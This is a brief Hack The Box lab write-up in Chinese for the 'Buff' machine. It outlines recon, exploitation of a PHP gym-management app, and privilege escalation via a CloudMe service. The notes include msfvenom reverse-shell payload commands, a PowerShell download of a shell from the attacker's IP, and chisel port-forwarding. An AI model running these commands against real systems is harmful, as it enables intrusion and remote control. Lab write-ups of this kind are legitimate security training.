Buff (Hack The Box Writeup)


  • URL : https://app.hackthebox.eu/machines/263
  • IP : 10.129.2.18

Recon

  • 掃 Port
  • 掃目錄
    • /Readme.md
  • 觀察首頁
      • SQL 檔案
  • 找到專案 Project
    • https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/
      • 預設密碼,登入失敗
  • 試用 Exploit
  • 準備另外一個 reverse shell
  • 確認 Systeminfo
  • 取 Userflag

提權

  • 確認 Defender 有開
  • 產 Shell
    • msfvenom -p php/reverse_php LHOST=10.10.16.35 LPORT=7877 -f raw > shell.php
    • powershell -c "wget http://10.10.16.35/shell.php -outFile shell.php"
  • 亂逛系統
  • 觀察開的 Port
    • netstat -ano -p tcp
  • 觀察執行中的 Process
    • tasklist
  • 發現 Downloads 資料夾有 CloudMe_1122.exe
  • 觀察開的 Port
    • 8888 但他只綁 127.0.0.1

Exploit

  • 本地端執行
    • ./chisel server -p 9999 --reverse
  • 遠端執行
    • chisel.exe client 10.10.16.35:9999 R:8888:127.0.0.1:8888
    • 把 Port 轉回 127.0.0.1:8888
  • 收封包
  • 使用 Exploit
    • https://www.exploit-db.com/exploits/48389
  • 修改 shell code
    • msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.35 LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
  • 收 Reverse shell
  • 取得 Root flag
,

發表迴響